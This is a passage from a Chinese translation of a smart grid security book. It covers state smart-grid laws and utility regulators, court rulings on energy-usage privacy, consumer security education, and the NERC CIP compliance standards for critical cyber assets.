NIST 的职员,包括律师,能够确定的知道所有重要的(我很确信)信息都包含在 内了。”[19] 或许有完美的法律规定的原因来解释为什么从隐私性影响评估报告中删除了 剩下的15页。但是,重点在于没有任何过程、计划、标注、指导和最佳实践是完美 的,而联邦计划应该有相应的解释。总是会有政府的障碍和政治势力来影响联邦 安全计划,不论是以一种积极地还是消极的方式。 4.9 总结 联邦政府已经明确指出保障智能电网安全是关乎国家安全的事情。因此,联 邦政府启动了一些安全计划并分配了数十亿美元来支持这些工作。电力和技术支 持商已经收到了明确的信息,安全性是发展电网的第一要务。 保持跟随最新的联邦标准、指导、需求和计划是一项艰难的挑战。根据 NIST SP 1108所述,“智能电网最终会需要成百的标准、定义和需求。”当前美国能源 部、DHS 、FERC 和 NIST 的安全标准和计划仅仅是建立联邦政府和能源产业联系 的初级阶段,并且这种联系会更加紧密。 智能电网安全中地方政府的角色 政府部门正逐渐意识到网络安全威胁的重要性。联邦政府在制定智能电网安 全规定、需求、标准和最佳实践中起到领导作用;然而,电力公司也被要求遵守州和 地方的安全计划。另外,开发智能电网产品的企业如果想要将产品出售给电力公 司,他们就要满足这些政府机构的要求。终端用户通常被认为是系统安全中最弱的一环。许多组织通过用户安全意识 教育来改善这一存在于他们雇员和消费者中的弱点。类似地,州和地方政府也会 在指导消费者如何安全地使用智能电网中起到至关重要的作用。 5.1 州政府 尽管北美电网区域覆盖了许多州和国家,州和地方政府还是寻求能对在自己 的管辖范围内的电网部分施加额外的规定和监管。包括加利福尼亚州和伊利诺伊 州在内的几个州已经创立了他们自己的智能电网计划。 5.1.1 州法律 许多州正在立法或者发起其他计划,来进一步管理电力公司并推动智能电网 的实现。这些法律条文中的大多数将重点放在了为设计和实现智能电网设置截止 时间上。增强的网络安全通常也被作为一个目标;但是,大多数这些法律没有描述具体的安全需求而仅仅依靠联邦政府和基于产业的安全计划。还有些州很可能颁 布全州的法律并且使得他们的法律模仿初始的州立法律。于是,电力和科技企业 应该紧密地观察州的立法来保证他们的产品符合新通过的条例规定。 1)加利福尼亚州 加利福尼亚州最近通过了美国的第一个全州范围的智能电网法律,编号为 Senate Bill(SB)17 。 法案要求加利福尼亚公共事业委员会(Public Utility Com- mission,PUC), 联合几个其他部门,创建符合州和联邦法律的智能电网部署方案。 此外,电器公司要求制定并向加利福尼亚公共事业委员会提交自己的智能电网计 划来获取许可。SB17 为加利福尼亚公共事业委员会和电气公司均设置了截止日 期,分别为2010年7月1 日和2011年7月1日。 注意 加利福尼亚州允许满足某些要求的电力公司以不同的方式处理列在SB17 中的要 求。拥有少于100000服务连接的电气公司可以修改或调整法案中的要求。 但 是,公共电力委员会拥有为这些电力公司修改或调整要求的权利。因此,电力公司 需要为修改提供证据。 根据法案的8360部分,加利福尼亚州的政策指明本州的智能电网需要满足智 能电网的10个特点,其中包含“有效的完全的网络安全性”。尽管这份声明的本 意是好的,但是这个要求既不实际又不现实。“完全的网络安全”,或者换句话说, 完全消除网络安全威胁的风险,是不可能的。因此,网络安全的目标,和其他安全 一样,是控制风险,而不是消除风险。此外,有效是一个带有主观性的词汇,这也是 造成预算纠纷的主要原因。实现智能电网安全控制来抵御网络安全威胁的代价是 很高的,而且为了达到建议的网络安全等级,实现最佳实践是需要大量投资的,更 不用说完全的网络安全。 值得赞扬的是,法案要求加利福尼亚公共事业委员会采纳 NIST 、Gridwise Architecture Council、国际电子电气工程师学会(IEEE) 、NERC 和 FERC 的标 准。口强制要求采用这些权威机构的标准会帮助加利福尼亚州实现列出的智能电 网的特点。 加利福尼亚公共事业委员会和加利福尼亚电子公司现在有一个截止日期 来制定智能电网部署计划。因此,智能电网安全会成为加利福尼亚公共事业 委员会和电气公司的安全合规部门的优先考虑对象。电气公司的截止日期比 加利福尼亚公共事业委员会的截止日期晚一年,这使得电气公司有足够的时 间来确保他们的计划符合加利福尼亚公共事业委员会的计划。如果不能符合 管理规定的大部分内容,加利福尼亚电气公司将会因此损失数百万美元,正如 将在本章“得克萨斯公共事业委员会”部分讨论的,发生在位于得克萨斯州的 电力公司那样。 2)伊利诺伊州 伊利诺伊电力局法案,SB1592, 要求电力公司在10年间每年减少0.1%的峰 值电力需求。这个要求促进了几家州电力企业的智能电网计划,包括部署大量的 智能仪表。此外,伊利诺伊州成为了中大西洋分布资源计划(Mid-Atlantic Dis-tributed Resources Initiative,http://sites.energetics.com/madri/)的一部分。尽 管智能电网安全需求没有在这份法案中特别说明,这些电力公司仍然要确保他们 的智能电网实现符合联邦和产业规定的要求。 3)马里兰 马里兰州议会通过了EmPOWER Maryland Energy Efficiency Act of 2008(参 见 Senate Bill 205)来减少电力消费并在2015年年底前将峰值电力需求降低 15%。[3]法案要求马里兰公共服务委员会(PSC) 来确定智能电网的有效性。此 外,法案授权公共服务委员会管理智能电网的实施。因此,马里兰的电力公司被 要求实现智能电网技术,尽管 SB 205 没有提到遵守或采用何种智能电网安全 标准。 4)州规定的安全 目前,大多数州的立法部门没有特别地指定智能电网计划法案中的安全 性。这些计划更多的将重点放在促进或要求电气公司实现智能电网技术并设 置截止日期来保证智能电网在一定时间内部署完成。尽管在州内运行的智能 电网会被要求符合其他组织制定的要求,比如联邦政府和产业监管组织,州立 法机关却失去了一个指定适合本州智能电网特殊实现的网络安全管控的关键 机会。 5.2 州立监管组织 本章之前描述的州计划和其他州的计划都包含一个相同的部分。他们授权或 依赖州立能源监管组织来设立对智能电网部署的需求。不同州之间的监管组织名 称不同,但大体上,这些监管组织的名称中会包含以下标识中的一个: ● 公共事业委员会 ● 企业委员会 ● 商业委员会 PUC PSC ● 公共事业管理 ● 公共服务委员会 ● 事业局 ● 事业监管委员会(URC) 州立监管机构及其网站列表见表5.1。更进一步的, 一些国家设立了功能类 似但运行在国家范围的国家监管机构,比如 Belize PUC(http://www.puc.bz/)。 某些监管组织似乎并不经常更新他们的网页;但是,公共事业和智能电网技术公司 应该关注这些网站来获取新的安全需求和其他当地的智能电网新闻。 这些组织的目标是监管运营在各自州内的电力公司。这些组织最明显的影 响是对电力公司向消费者收取的电力价格的监管。但是,这些组织有更大的权 利和责任。如本章之前加利福尼亚州部分描述的,加利福尼亚公共事业委员会 要负责创建电力公司需要符合的智能电网部署计划。因此,这些组织具有难以 置信地引导电力公司和智能电网技术公司实现一个更安全的电网的能力。尽管 在这些组织制定自己计划的同时,智能电网已经在积极地实现中,但这些监管组 织和受其监管的电力公司仍然有足够的时间来确保安全性在智能电网的实现中 起到重要作用。 5.2.1 国家电力监管协会 国家电力监管协会(NARUC,http://www.naruc.org/) 是一个以提升公共电 力监管为目标的非盈利组织。NARUC 在1899年成立,它的成员涵盖了50个州、 华盛顿特区和其他几个美国领土。国家电力监管协会频繁地向国会和联邦政府部 门申请提升州立电力监管组织的权利。通常,NARUC 会举办三个年度性的会议,在会上提出解决方案并投票。被认 可的解决方案之后将作为NARUC 的政策活动的基础。因此,应当经常关注 NA- RUC 的网站以获取最新的可能影响到州的规章制度的新计划。此外,NARUC 的 网站也可以被视为一个有价值的资源,用以关注其他州和地区如何监管智能电网。具体来讲,NARUC 的网站有一个页面(http://www.naruc.org/SmartGrid/) 专门来向州委员会提供智能电网资源。 5.2.2 科罗拉多州公共事业委员会 博尔德市已经成为智能电网技术的试点区域并且很可能影响其他州对于智能 电网技术的采用。同时,科罗拉多州公共事业委员会最近发起了一项针对智能测 量隐私关注的调查。他们主要担忧其他非电力产业会使用消费者电力模式,并且 向市场调查公司和执法部门展示如何根据其自身需要利用这些数据。在 Docket No.09I-593EG 中,委员会声称,从智能电网收集的信息可能将极大的牵连消费者 的隐私。调查的结果会对科罗拉多州的智能电网安全产生极大影响。委员会可能受此 影响而制定新的、更强壮的安全策略来确保电力公司采取了足够的手段来保护消 费者的数据隐私。作为对调查的回应,科罗拉多消费者办公室(the Colorado Of- fice of Consumer Counsel,OCC,http://www.dora.state.co.us/occ/)已经建议 科罗拉多公共事业委员会实现新的保护策略,并建议实现 opt-in/opt-out 服务。[5] Opt-in/opt-out 服务允许消费者规定电力公司能否向第三方公布他们的用户数据。 科罗拉多州公共事业委员会可以利用这项调查来制定新的政策,并在政策中要求保证传输和存储用户数据时强制执行对应的安全控制。这对于电力公司有极大的 启示。尽管这并不是第一次针对智能电网提出的个人隐私方面的关注,科罗拉多 州公共事业委员会还是具有管理科罗拉多州电力公司如何保护数据的权利。由于 智能仪表会产生并传输用户数据,希望产品能在科罗拉多州销售的智能仪表提供 商需要紧跟调查的结果来确保他们的产品符合所有要求提供额外隐私性和安全控 制的政策。 5.2.3 得克萨斯州公共事业委员会 奥斯丁是美国最早实现智能电网技术的城市之一,并且得州的一些其他地区 也在逐步实现智能电网的过程中。得州州立法律鼓励电力公司采用智能电网技 术,这加快了智能电网的部署速度。 电力公司需要密切关注所有相关的管理组织来获取他们会被要求遵守的最新 的规章、标准和要求。尽管不太可能预测未来的要求,电力公司还是需要在采购新 技术时格外小心,以此来确保他们符合了所有的要求。购买不符合要求的技术可 能会造成数亿美元的损失,这对于得州的电力公司来说是完全可能的。 经典失败案例 几年前,得州面临电力供应不足,得州公共事业委员会督促电力公司部署智 能仪表来降低电力需求。Oncor 电力公司(http://oncor.com/)购买了900000 套智能仪表进行部署。然而,得州公共事业委员会尚未对智能仪表的功能需求 给出明确定义。之后,得州公共事业委员会定义了智能仪表的运行是不符合规 定的。[6] 于是,Oncor 公司被要求用新的智能仪表代替不符合规定的智能仪表。此 外,Oncor 要求增加2.53亿美元的投资来恢复由于智能仪表更换带来的经济损 失,而这意味着向每位消费者增加5美元每月的费用。 然而,德州公共事业委 员会仅仅为此拨款1.3亿美元,或者说是为每位消费者每月支付2.4美元。关 于这种处理方式的争论尚未停止,而消费者对于要为旧的电表买单很不满意,他 们认为这是Oncor 公司的失误。不管这是谁的错,Oncor 现在具有了一群愤怒 的顾客,而他们很可能成为潜在的安全威胁。如第3章,“电力公司及其他的威 胁和影响”中描述的,愤怒的顾客可能通过毁坏电力公司来寻求报复或者试图获 取大量的金钱来补偿他们每月的费用以及造成的精神损失等等。 Oncor 宣称旧的仪表仍然可以被用作其他用途,比如路灯。 因此,Oncor 会使用至少两种不同的仪表并且需要对至少两种模型的安全负责。尽管智能电 网技术被认为是相对较新的技术,Oncor 将不得不处理遗留的智能电网系统,这 可能会增加智能电网的复杂性。如何保障遗留系统的安全是安全领域中知名的难题,许多组织都在寻求解决方案。 5.2.4 未来的计划 尽管目前得州是基于运营标准的,但类似的情况还是可能因为官方组织提出 的新的安全标准而发生。电网的安全事件经常会引发新的安全法律、规定和需求 的创建,电力公司应该要预计到变化的发生并为之做好准备。电力公司需要在采 购新技术时避免再发生类似于德州这样的事件。在采购新技术时,企业需要确保 设备符合所有现存的要求,而且设备还需要符合或者超过企业自己的要求。定义 更严格的安全需求有助于防止技术过时。 一个常见的安全问题被称为硬编码漏洞,例如直接向编译好的应用程序植入 登陆证书或不能通过软件控制的不安全的硬件设置。当采购新的智能电网技术 时,企业需要调查产品的安全和功能方面的提升能力,以及在不更换硬件的情况下 升级到新版本的能力。提供商应该具有未来版本的开发计划并且应该能够确保提 供升级兼容性。 提示 这些安全需求,和功能需求一样,应该在系统开发生命周期(SDLC) 的开始阶段 被定义。在开发任何一种系统时,包括那些购买商用货架产品的项目,SDLC都应该被用来确保系统是按照需求被准确、有效且安全的开发的。有许多不同的 SDLC 模型可供选择,但是一个将安全性放在主要地位的模型即为安全 SDLC (SecSDLC) 模型。这个模型将安全因素作为最优先考虑的因素。不幸的是,不 是所有的 SDLC 模型都能在你的组织中有效实行,你需要判断能够用于你所在 的特定组织的模型。获取更多向指定的系统开发过程中加入安全性的信息,请 查看NIST SP800-64:“系统开发生命周期中的安全考虑,”这份文档可以在 http://esrc.nist.gov/publications/nistpubs/800-64-Rev2/SP800-64-Revision2.pdf 找到。 5.3 州法院 公共事业委员会具有管理运营在本州内部的电力公司的权利;但是,州法院 也会在决定电力公司如何运行智能电网的过程中起到关键作用。州法院系统能够决定智能电网政策的合法性并参与智能电网产生信息的数据分类工作中。从 历史角度看,我们可以预期电能使用数据的隐私政策会受到州和联邦法院的极 大重视。 5.3.1 科罗拉多州上诉法院 在 People v.Dunkin案件中,科罗拉多州上诉法院裁定消费者在电能消费数 据上不具有合理的隐私要求,因为这些数据没有揭露单个消费者的信息。 科罗拉 多州上诉法院在1994年做出这个裁定,在那时使用的是传统的非数字化的仪表。 然而,如果使用的是智能仪表,法庭很可能做出完全相反的裁定。[8]分析智能仪表 中具体的电能使用数据的结果被完整的记录下来,并且在第2章,“消费者的威胁 和影响”中被讨论过。 5.3.2 启 示 People v.Dunkin案件对于和执法部门打交道的电力公司具有隐私性方面的 启示。电力公司显然需要向获得许可的执法部门提供使用数据,但是电力公司应 该自发地向执法部门提供使用数据吗?此外,电力公司这么做危害到顾客的个人 隐私权利吗?可能只有靠法庭来裁决向执法部门提供来自智能电表的使用数据这 一行为的合法性了。 电力公司需要密切关注联邦和州的法律,以及法庭做出的裁决来确保他们既 保护了消费者隐私又符合了法律。如第3章“电力公司及其他的威胁和影响”中描 述的,过度的向执法部门提供消费者的数据会给电力公司和智能电网技术带来负 面影响。 5.4 促进安全教育 即使使用了正确实现的安全控制,终端用户的不安全活动还是会帮助攻击者 绕过安全控制。例如,密码复杂性控制能够强制要求用户选择符合最低安全需求 的密码,比如密码长度、必须包含字母数字以及特殊字符。然而,用户会选择容易 记忆的密码比如狗的名字和狗的生日(pickle@2002), 但这很容易在用户的社交网 络档案中找到。 警告 过于严格的安全控制会让用户感到沮丧并可能导致用户对妨碍系统可用性的安全 控制产生逆反心里。不过,尽管用户会抱怨很难使用的应用,如果他们一旦收到了 费用是平时三倍的错误账单时,他们会抱怨得更加严重。 在第2章“面向消费者的威胁和影响”中,我们讨论了智能电网如何使用户陷 入危险之中。使用智能电网,电力公司能够使得消费者通过许多方式与电网交互。 电力使用信息会变得随处可得,并通过电子邮件、短信、社交网络页面以及许多其他新的方式发送给消费者。更值得关注的是,消费者能够控制他们的电能使用情 况,比如控制加热器甚至是高压交流电设置,通过网络连接,这种能力可能被任何 人获得。但是,消费者可能没有意识到他们在智能电网安全中扮演的重要角色,这 也是为什么州和地方政府部门以及当地监管组织都在积极地向消费者推行智能电 网安全教育。直接针对消费者和间接的通过电力公司进行的计划会帮助减少由信 息匮乏的消费者造成的安全风险。 州和地方政府应该直接针对消费者提供安全实践的相关信息,比如选择强壮 的密码和不在公开场合分享某些信息。尽管对所有用户进行认知教育是不切实际 的,但电视、网络和其他宣传手段都应该被使用来传播这些信息。这些媒体曾经被 用来宣传节能计划,比如购买节能设备以及调低空调的温度。由于消费者熟悉这 些媒体,电力公司应该利用他们来帮助提高消费者的安全操作意识。 电力公司也应该使用新媒体来普及安全操作规范以增强安全性。例如,墙上 的通常用于显示当前使用数据和控制智能设备的单元,可以循环播放不同的最佳 安全实践。同智能电网远景中希望的无所不在的消费方式一样,电力公司可以用 同样的方法让安全性的最佳实践无所不在。 5.5 政策和智能电网 各种级别的计划,包括州和地方的,都可能提供正确实现智能电网的指导,或 者更准确地说,是特定的组织如何理解正确实现智能电网的方式。政治和经济利 益团体很可能影响到政府的智能电网计划,这具有极大的安全性启示。 例如,考虑一家风险投资机构计划向智能电网技术公司投资。这家风险投资 公司游说州参议员加速州内智能电网的实现。于是,实现智能电网的期限变得过 于激进而没有足够的时间进行计划和设计。于是,智能电网部署得很仓促,推荐的 安全控制没有被很好的实现。 另一个例子,考虑一家智能电表提供商,它的产品没能符合一项即将产生的州 法案中提出的强制安全需求。提供商会对几位参议院展开攻势,要求修订法案,移 除几条关键性的安全需求。因此,智能仪表提供商现在可以用他们安全性较差的 产品参与州电力公司智能仪表合同的竞争。 5.6 总结 目前已经制定了数以百计的规定、标准以及指导用来定义达到推荐安全性等 级的需求和智能电网安全中的最佳安全实践指导。这些文件会继续被回顾、研读、 修订和改善。此外也会制定新的文件用来阐述逐步发展的智能电网技术。这些文 件中的大多数提供了大量向智能电网组件中集成安全控制的相关知识。因此,智 能电网专家必须定期关注新的需求和最佳实践。 一些州已经有计划来促进,甚至是要求智能电网的部署。使用联邦政府提供 的可用资金,剩下的州很可能也会创建自己的计划。加州法律特别声明智能电网 应该符合其中几个指定标准中定义的最佳实践。通过在自己的计划中包含类似的 条目,全国的州立法机构会有效地创立一个更加安全的电力基础设施。不同的公 司将采用不同的方式来设法符合规定。较大的公司会有独立的合规部,而较小的 公司会将这个任务交给安全部门。无论最终是哪个部门负责,他们都需要密切关 注州立法机构和电力监管组织来确保自己是符合规定的。即使完全符合州和当地 的安全规定以及其他级别的规定,或许也不会完全保证智能电网的安全。州和地 方的安全需求可能并不完美,企业应该将这些规定视为最小安全等级要求。仅仅 符合最低的安全要求从眼前看似乎是划算的;但是, 一旦安全性或隐私性被破坏, 付出的代价会远高于合适的安全实现。 大多数消费者并不是隐私或信息安全专家,因此他们需要别人来协助了解自 己的角色,告诉他们哪种安全实践对于实现智能电网、个人信息和供电的安全是至 关重要的,以及它的原因。 上市公司与私人公司 6.1 行业自我监管方案 行业自我监管规范中最重要的是NERC 发布的关键基础设施保护标准(Criti- cal Infrastructure Protection,CIP),NERC在2006年7月20日被美国联邦能源监 管委员会 FERC 任命为政府电力可靠性组织(Electric Reliability Organization, ERO) 。 在这之前,NERC 就已在行业内合作制定出了电力公司自愿遵守的规范。 在指定为电力可靠性组织之后,其规范便成了电力公司在美国和加拿大部分地区 运作所必需遵守的标准。作为电力可靠性组织,NERC 也负责实施与CIP 标准的 一致性。对于与 CIP 标准不一致的电力公司,将会对其处以每天1000美元到 1000000美元的经济处罚。 警省 如果你认为 FERC 对违反 NERC 标准的处罚只是说说而已,那么你再谨慎考虑一 下。2009年10月,FERC 和佛罗里达电力和照明公司(Florida Power and Light Company,FPL) 就2008年2月26号该公司断电对南佛罗里达几百万用户造成的 影响达成决议,FPL 支付了2500万美元罚款。FERC 的执法委员会主任表示,“向 这个行业传递的信息很明确:遵守这个标准是至关重要的。” 6.1.1 NERC 关键基础设施保护标准 NERC 的 CIP 标准包括8个主要标准。根据这本书的宗旨,可以将它们分为 以下两类: (1)电子安全 (2)物理和人员安全 为了了解CIP 标准的优势和劣势,我们在后面的部分会强调具体要求,如何评 估一致性以及合适的不一致级别。 你必须要熟悉的专业术语包括: ● 责任实体—NERC 的 CIP-002 标准列出了以下的“责任实体”[5]; ● 可靠性协调员 ● 平衡权威机构 ● 交换权威机构 ● 传输服务提供商 ● 传输公司 ● 传输运营商 ● 发电公司 ● 发电运营商 ● 负荷服务企业 ● NERC ● 区域可靠性机构 该标准中以下实体不视为“责任实体”[3]; ● 美国核管理委员会或加拿大核安全委员会管理的设施 ● 与离散的电子安全边界之间的通信网络和数据通信链路相关的网络资产 ● 电子安全边界——隔离包含重要网络资产的网络的逻辑边界 1)电子安全 以下是电子安全一类的 CIP 标准: ● CIP-002——关键网络资产标识 ● CIP-003——安全管理控制 ● CIP-005——电子安全保护 ● CIP-007——系统安全管理 ● CIP-008 事故报告和响应计划 ● CIP-009——灾难恢复 现在让我们浏览一遍这些标准以了解它们是如何保护智能电网的。 (1)CIP-002—— 关键网络资产标识 CIP-002 要求相应的实体标识并记录他们的关键网络资产,这些关键网络资 产与可靠地操作他们的大容量电力系统的关键资产相关。这些实体必须使用基于 风险的评估方法来标识其关键资产,提供评估文档,且文档中必须包括使用的方法、评估标准以及相关过程和程序。基于风险的评估必须每年至少要执行一次。 相应实体在执行基于风险的评估时必须考虑大量的资产类别,包括以下: ● 主要及备用的实现关键功能的控制中心 ● 支持可靠性操作大容量电力系统的输电变电站[5] ● 支持可靠性操作大容量电力系统的其他普通资源[5] ● 系统恢复和自动切负荷的关键系统和设备 ● 支持可靠性操作大容量电力系统的特殊保护系统[5] ● 实体自身认为适合支持可靠性操作大容量电力系统的其他资产。 标识关键网络资产的过程比较简单。CIP-002 定义关键网络资产具备至少一 种以下的特征: ● 使用路由协议与电子安全边界外部通信 ● 在控制中心内部使用路由协议 ● 允许拨号访问 警 智 有趣的是,NERC 的 CIP-002 标准并不适用于与离散的电子安全边界之间的数据 和通信网络相关的网络资产。在这种情况下,商业伙伴之间的 WAN 通信线路就 不在这个范围之内了。 为证明与 CIP-002 标准的一致性,实体必须提供以下材料: ● 基于风险的评估方法文档 ● 关键资产清单 ● 关键网络资产的清单 ● 高管或其代表每年审核通过以上资料的文件 如果一个实体被评定为与标准不一致,则会评定其属于四个不一致级别中的 哪个级别。表6.1 中列出了这些级别及其满足的条件。 (2)CIP-003 安全管理控制 CIP-003 标准要求实体实施最低安全管理控制来保护关键网络资产(CIP-002 中标识的所有关键网络资产)。CIP-003 标准的核心要求就是实体的网络安全策略。这个网络安全策略必须考虑CIP-002 标准到 CIP-009 标准中的要求,还包括 对紧急情况的规定。 注意 满足CIP-002 标准要求的实体,如果没有任何关键网络资产,则不需要满足 CIP- 003标准的要求。这种情况适用于大部分 CIP 标准,在其他每一个标准中都会被 提到。 实体在满足网络安全策略要求的同时,也要保证这些关键网络资产对所有负 责人员或是有访问权限的人员是可用的。与 CIP-002 类似,网络安全策略必须进 行年度复审并经过高级管理者审批通过。 除了网络安全策略之外,CIP-003 标准还明确了关键资产和关键网络资产所 涉及的人员角色和责任。CIP-003 标准特别要求有专门的高级管理者来负责实体 实现并遵守CIP-002 到 CIP-009 标准,且该高管必须有以下信息来标识: ● 姓名 ● 头衔 ● 办公电话 ● 办公地址 ● 任命日期 高管的任命变化必须在变动后的30天之内记录下来。高管负责授权和记录 上述网络安全策略要求之外的任何例外。 CIP-003 也对网络安全策略的特例有要求。当实体无法确认网络安全策略 时,对这些特例的记录,以及高管或者其代表记录的授权,都必须到位。以下是对 网络安全策略特例的特殊要求: ● 异常必须在高管或其代表批准通过的30天内记录。 ● 批准通过的特例必须阐述记录该异常的必要性,以及任何补偿措施或者接 受的风险。 ● 每个特例都要经高管或其代表年度复审并接受。该过程同样也要记录。 提示 CIP-003 标准允许实体在处理网络安全策略特例时接受风险。接受风险是万不得已的情况,所以为高管或其代表提供完整的信息是非常必要的。出现特例时,必须 保证全面覆盖当前以及将来的风险,同时确保决策人能够明白他们接受意味着什么 。 从策略到实现,CIP-003 标准要求实体建立、记录和维护计划来保护与关键网 络资产相关的信息。CIP-003 特别对相关信息的保护有以下要求: ● 最低程度有保护操作过程,CIP-002 标准要求的列表、网络拓扑结构、数据 中心平面图(包含关键网络资产的数据中心)、关键网络资产的设备布局、 灾难恢复计划、安全配置。 ● 前面提到的计划保护的信息是基于关键网络资产信息的敏感性的。 ● 实体必须至少每年执行一次评估,以判定是否遵守其建立的计划。评估结 果必须要记录,并且必须实施行动计划来补救标识出的任何缺陷。 CIP-003 标准同样要求实体建立、记录并实施计划来管理对受保护的关键网 络资产信息的访问。具体来说,必须满足以下访问控制要求: ● 应该具有负责授权逻辑或物理访问受保护信息人员的列表。这些人员的 标识信息有姓名、头衔、电话以及负责授权访问的信息。与之前提到的清 单类似,这个人员列表也应该至少一年被审核一次。 ● 应该至少一年审查一次授权的访问是否合适,这个应该综合被授权人员的 角色和责任来确定。 ● 实体应该至少一年一次对控制访问受保护信息的过程进行记录和评估。 最后,CIP-003 标准规定了关键网络资产的更改控制和配置管理的特殊要求。 实体应该建立和记录添加、修改、替换或移除关键网络资产软硬件(更改管理)的更 改控制的过程和控制实施过程。必须具备一个过程来标识、控制和记录所有相关 实体或相关供应商按照更改控制过程对关键网络资产的硬件及软件组件进行的 更改。 为证明与 CIP-003 标准的一致性,实体必须提供以下材料: ● 网络安全策略可用性文档 ● 领导任命和变动的文档 ● 特例文档 ● 信息保护计划文档 ● 访问控制文档 ● 更改控制和配置管理文档 如果一个实体被评定为与标准不一致,则会评定其属于四个不一致级别中的 哪个级别。表6.2中列出了这些级别及其满足的条件。 (3)CIP-005—— 电子安全保护 CIP-005 标准要求实体标识并保护覆盖关键网络资产的电子安全边界。这就 包括保护这些边界的所有访问点。类似于CIP-003 标准,没有标识任何关键网络 资产的实体也不用满足CIP-005 标准的要求。 CIP-005 标准特别要求实体确保关键网络资产都在电子安全边界范围之内。 实体必须标识和记录这些边界及其访问点。包含在电子安全边界的访问点内部的 是外部通信的终点,例如拨号调制解调器在电子安全边界上结束。CIP-005 标准 的要求也考虑了电子安全边界中的非关键网络资产。此外,CIP-005 标准还指出 涉及访问控制如活动目录域控制器以及像IDS 之类监控的网络资产,还受以下 CIP 标准的适当控制约束: ● CIP-003 ● CIP-004 ● CIP-005 ● CIP-006 ● CIP-008 CIP-009 CIP-005 标准要求实施并记录控制进入电子安全边界的管理进程和技术过 程。其中,技术过程要求遵循默认的拒绝模型,显示访问电子安全边界中的关键以 及非关键网络资产。在默认的拒绝模型基础上,CIP-005 标准要求只有在操作和 监控电子安全边界内网络资产时,需要的端口和服务才能激活访问,并且要对这些 端口和服务进行单独或分组记录。 CIP-005 标准还涵盖了其他保护电子安全边界的访问控制的要求,包括安全 拨号访问,要求有一个合理的使用原由,确保电子安全边界内的网络资产和外部交 互访问的真实性。为保证真实性实施的技术控制也必须记录并包含以下信息: ● 请求访问和授权的过程 ● 使用的认证方法 ● 按照CIP-004 要求使用的审查授权操作的过程 ● 拨号访问安全的控制 CIP-005 标准同时也涵盖监控电子安全边界内的网络资产的电子访问。要求包括对电子安全边界访问点的访问过程进行不断监控和日志记录的电子过程或人工过程的实施和建档。CIP-005 标准也要求了在技术可行范围内监控非路由拨号 访问关键网络资产的过程。 同时,在技术可行范围内,也要求监测对电子安全边 界内网络资产的未授权访问并报警。 注意 如果对电子安全边界内网络资产的未授权访问的监测和报警在技术上不可行, CIP-005 标准要求实体必须至少三个月审查一次访问日志,以标识未授权访问成 功与否。CIP-005 标准规定实体要对电子安全边界进行至少一年一次的脆弱性评估。 除了简单执行脆弱性评估,实体必须要记录脆弱性评估过程,其中包括确保只开启 了操作需要的端口和服务的审查过程,同时找到电子安全边界的所有入口点,标识 默认的账户、密码以及简单网络管理协议(SNMP) 团体字符串。必须记录评估结 果,制定降低网络脆弱性的方案计划。最后,CIP-005 标准要求实体要至少一年一次审查和更新CIP-005 标准要求的 文档。这些审查应该支持标准一致性,确保所有相关文档准确地反映真实配置和 进程情况。标准也要求网络或实施控制的修改在90天之内记录在文档中。实体 要对访问日志进行至少90天的保存,以支持事故调查,该项要求包含在 CIP-008 标准中。 为证明与CIP-005 标准的一致性,实体必须具备上述讨论的文档,包含以下信息: ● 电子安全边界 ● 访问控制 ● 日志和监控控制 ● 脆弱性评估 ● 访问日志审查 ● 记录审查与更改 如果一个实体被评定为与标准不一致,则会评定其属于4个不一致级别中的 哪个级别。表6.3中列出了这些级别及其满足的条件。 (4)CIP-007—— 系统安全管理 CIP-007 标准要求实体定义为保护关键网络资产以及在安全电子边界内的网 络资产安全的方法和过程。没有关键网络资产的实体不用满足CIP-007 标准的 要求。 CIP-007 的第一类要求是关于正确的测试过程,以阻止由于电子安全边界内 网络资产的重大变化引起的不利影响。重大变化至少包括安全补丁、服务包、更 新、操作系统升级、应用程序、数据库平台或者其他软件硬件的变化。 CIP-007 特别要求实体开发、实施和维护测试重大变化安全性的过程。实体 必须记录测试活动并保证测试是以一种可以反映生产环境的方式进行的。测试的 最终结果也需要被记录。 CIP-007 在 CIP-005 基础之上进一步要求实体开发和记录确保只有在正常和 紧急操作的情况下才能启用要求的端口和服务的过程。特别是,标准要求实体应 该只开启那些正常操作和紧急操作需要的端口和服务,而进入电子安全边界之前 确保系统其他的端口和服务关闭。如果存在正常和紧急操作都不需要的端口和服 务不能被禁用的情况,实体应该记录并能够指出减轻风险的补偿措施。万不得已 的情况下,无法关闭的不必要的端口和服务可以被认为是可以承担的风险。CIP-007也对安全补丁管理做了要求。实体应该建立并记录一个安全补丁管 理计划,用于电子安全边界内所有网络资产的安全补丁的跟踪、评价、测试以及安 装。这个计划可以作为单独的,也可以作为 CIP-003 要求的配置管理计划的一 部分。实体应在安全补丁发布后的30天之内对其适用性进行评估并记录结果。如果可用还必须记录其实现。若该补丁还未安装,则必须有补偿措施或承担风险的 文档。 CIP-007 标准规定了防范恶意软件的要求。实体应在技术可行的前提下使用 防病毒软件和其他防止恶意软件的工具。实体应记录并实施反病毒和恶意软件阻 止工具。在没有安装防病毒软件和恶意软件预防工具的情况下,实体应对可以降 低风险的补偿措施或是承担风险进行存档。反病毒和恶意软件防范工具的签名更 新必须遵循文档记录的过程,包括签名的测试和安装。 CIP-007 标准的第五个要求是账户管理。该标准要求负责单位应建立、实施 和记录访问认证的措施,以确保所有用户活动的可审计性,从而降低对网络资产未 授权访问的风险。 账户管理要求在为个人和共享账户授予访问权限时遵循“最小权限”原则。实 体应建立相应的方法、过程来生成日志,以提供对个人用户账号访问的历史审计追 踪。该日志至少保留90天。实体还应至少每年一次对用户账号进行审查,以确保 其访问权限符合标准要求。 实体必须实施策略来管理管理员、共享以及普通账户(包括厂商默认账户)的 权限,尽可能使用删除、禁用、重命名等方法来修改这些账户。对于必须使用的账 户,应该在系统使用之前更改默认密码。实体必须标识共享账户用户,并有相应的 策略来限制只有授权用户才能访问,确保人事变化时共享账户的安全。最后,实体 必须建立并审计追踪共享账户的使用。 CIP-007 的 R5.3 要求在技术可行的前提下密码要复杂,其要求如下: ● 至少6个字符 ● 应是字母,数字和“特殊字符”的组合 ● 至少每年更改一次,或根据风险状况更频繁地更换 CIP-007 的第六条要求是对电子安全边界内的网络资产进行安全状态监控。 具体来说,实体应建立并实施技术和程序机制来监控电子安全边界内的所有网络 资产。监控必须能通过自动进程或者手动进程发出警报,而且必须记录网络安全 事故相关的系统事件。实体要审查这些日志,并且这些日志至少要保留90天。尽 管没有提到审查的频率,但实体应该记录对网络安全相关系统事件日志的审查 情况。 CIP-007 标准的第七条规定了对在电子安全边界内处置或重新部署网络资产 